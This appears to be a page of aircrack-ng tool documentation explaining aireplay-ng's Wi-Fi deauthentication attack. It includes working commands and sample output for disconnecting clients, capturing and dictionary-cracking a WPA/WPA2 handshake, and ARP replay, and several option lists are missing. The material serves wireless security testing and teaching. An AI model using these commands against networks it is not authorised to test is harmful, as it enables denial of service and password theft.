Table of Contents

Deauthentication

Description

This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.

Usage

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Where:

Here is typical output:

 12:35:25  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.

Here is what the “[ 61|63 ACKs]” means:

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Explanation of the above:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Where:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type) otherwise the card won't be correctly setup for injection.

Usage Tips

It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting

Why does deauthentication not work?

There can be several reasons and one or more can affect you:

General

See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.